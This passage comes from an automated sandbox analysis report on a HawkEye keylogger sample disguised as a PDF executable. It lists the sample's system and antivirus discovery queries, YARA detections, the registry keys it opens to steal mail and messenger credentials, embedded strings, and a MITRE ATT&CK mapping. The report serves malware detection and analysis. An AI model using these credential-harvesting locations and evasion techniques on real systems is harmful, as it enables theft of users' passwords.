              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_0041604B GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,7_2_0041604B
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,8_2_0040724C
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00407674 GetVersionExW,7_2_00407674
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
              Source: C:\Users\user\Desktop\5O857649056366403032021.PDF.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

              Stealing of Sensitive Information:

              barindex
              Yara detected HawkEye KeyloggerShow sources
              Source: Yara matchFile source: 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.774686882.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 5O857649056366403032021.PDF.exe PID: 5444, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 5O857649056366403032021.PDF.exe PID: 3468, type: MEMORY
              Source: Yara matchFile source: 0.2.5O857649056366403032021.PDF.exe.3c22610.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.5O857649056366403032021.PDF.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.5O857649056366403032021.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.5O857649056366403032021.PDF.exe.45fa72.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.5O857649056366403032021.PDF.exe.3c22610.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.5O857649056366403032021.PDF.exe.409c0d.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.5O857649056366403032021.PDF.exe.3a73b90.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.5O857649056366403032021.PDF.exe.387bbb0.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.5O857649056366403032021.PDF.exe.31cb310.6.raw.unpack, type: UNPACKEDPE
              Yara detected MailPassViewShow sources
              Source: Yara matchFile source: 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.778097540.00000000041A9000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 5O857649056366403032021.PDF.exe PID: 5444, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 5O857649056366403032021.PDF.exe PID: 3468, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 6724, type: MEMORY
              Source: Yara matchFile source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.5O857649056366403032021.PDF.exe.41a9930.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.5O857649056366403032021.PDF.exe.3c22610.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.5O857649056366403032021.PDF.exe.45fa72.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.5O857649056366403032021.PDF.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.5O857649056366403032021.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.5O857649056366403032021.PDF.exe.45fa72.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.5O857649056366403032021.PDF.exe.3c22610.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.5O857649056366403032021.PDF.exe.41a9930.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.5O857649056366403032021.PDF.exe.409c0d.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.5O857649056366403032021.PDF.exe.3a73b90.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.5O857649056366403032021.PDF.exe.387bbb0.4.raw.unpack, type: UNPACKEDPE
              Tries to steal Instant Messenger accounts or passwordsShow sources
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Tries to steal Mail credentials (via file access)Show sources
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Tries to steal Mail credentials (via file registry)Show sources
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword8_2_00402D9A
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword8_2_00402D9A
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: ESMTPPassword8_2_004033D7
              Yara detected WebBrowserPassView password recovery toolShow sources
              Source: Yara matchFile source: 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.275551658.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.778097540.00000000041A9000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 5O857649056366403032021.PDF.exe PID: 5444, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 6732, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 5O857649056366403032021.PDF.exe PID: 3468, type: MEMORY
              Source: Yara matchFile source: 2.2.5O857649056366403032021.PDF.exe.41a9930.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.5O857649056366403032021.PDF.exe.3c22610.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.5O857649056366403032021.PDF.exe.409c0d.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.5O857649056366403032021.PDF.exe.41c1b50.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.5O857649056366403032021.PDF.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.5O857649056366403032021.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.5O857649056366403032021.PDF.exe.3c22610.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.5O857649056366403032021.PDF.exe.41c1b50.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.5O857649056366403032021.PDF.exe.409c0d.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.5O857649056366403032021.PDF.exe.3a73b90.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.5O857649056366403032021.PDF.exe.387bbb0.4.raw.unpack, type: UNPACKEDPE

              Remote Access Functionality:

              barindex
              Detected HawkEye RatShow sources
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
              Source: 5O857649056366403032021.PDF.exe, 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.774686882.00000000031A1000.00000004.00000001.sdmpString found in binary or memory: HawkEyeKeylogger
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.774686882.00000000031A1000.00000004.00000001.sdmpString found in binary or memory: l&HawkEye_Keylogger_Execution_Confirmed_
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.774686882.00000000031A1000.00000004.00000001.sdmpString found in binary or memory: l"HawkEye_Keylogger_Stealer_Records_
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
              Source: 5O857649056366403032021.PDF.exe, 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
              Yara detected HawkEye KeyloggerShow sources
              Source: Yara matchFile source: 00000002.00000002.767924598.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.219158430.00000000037D9000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.774686882.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 5O857649056366403032021.PDF.exe PID: 5444, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 5O857649056366403032021.PDF.exe PID: 3468, type: MEMORY
              Source: Yara matchFile source: 0.2.5O857649056366403032021.PDF.exe.3c22610.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.5O857649056366403032021.PDF.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.5O857649056366403032021.PDF.exe.408208.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.5O857649056366403032021.PDF.exe.45fa72.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.5O857649056366403032021.PDF.exe.3c22610.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.5O857649056366403032021.PDF.exe.409c0d.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.5O857649056366403032021.PDF.exe.3a73b90.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.5O857649056366403032021.PDF.exe.387bbb0.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.5O857649056366403032021.PDF.exe.31cb310.6.raw.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Replication Through Removable Media1Windows Management Instrumentation1Application Shimming1Application Shimming1Disable or Modify Tools1Input Capture1System Time Discovery1Replication Through Removable Media1Archive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsNative API11Boot or Logon Initialization ScriptsProcess Injection312Deobfuscate/Decode Files or Information11Credentials in Registry2Peripheral Device Discovery1Remote Desktop ProtocolEmail Collection1Exfiltration Over BluetoothRemote Access Software1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsShared Modules1Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information141Credentials In Files1Account Discovery1SMB/Windows Admin SharesInput Capture1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing13NTDSFile and Directory Discovery1Distributed Component Object ModelClipboard Data1Scheduled TransferApplication Layer Protocol1SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading11LSA SecretsSystem Information Discovery17SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion14Cached Domain CredentialsSecurity Software Discovery121VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
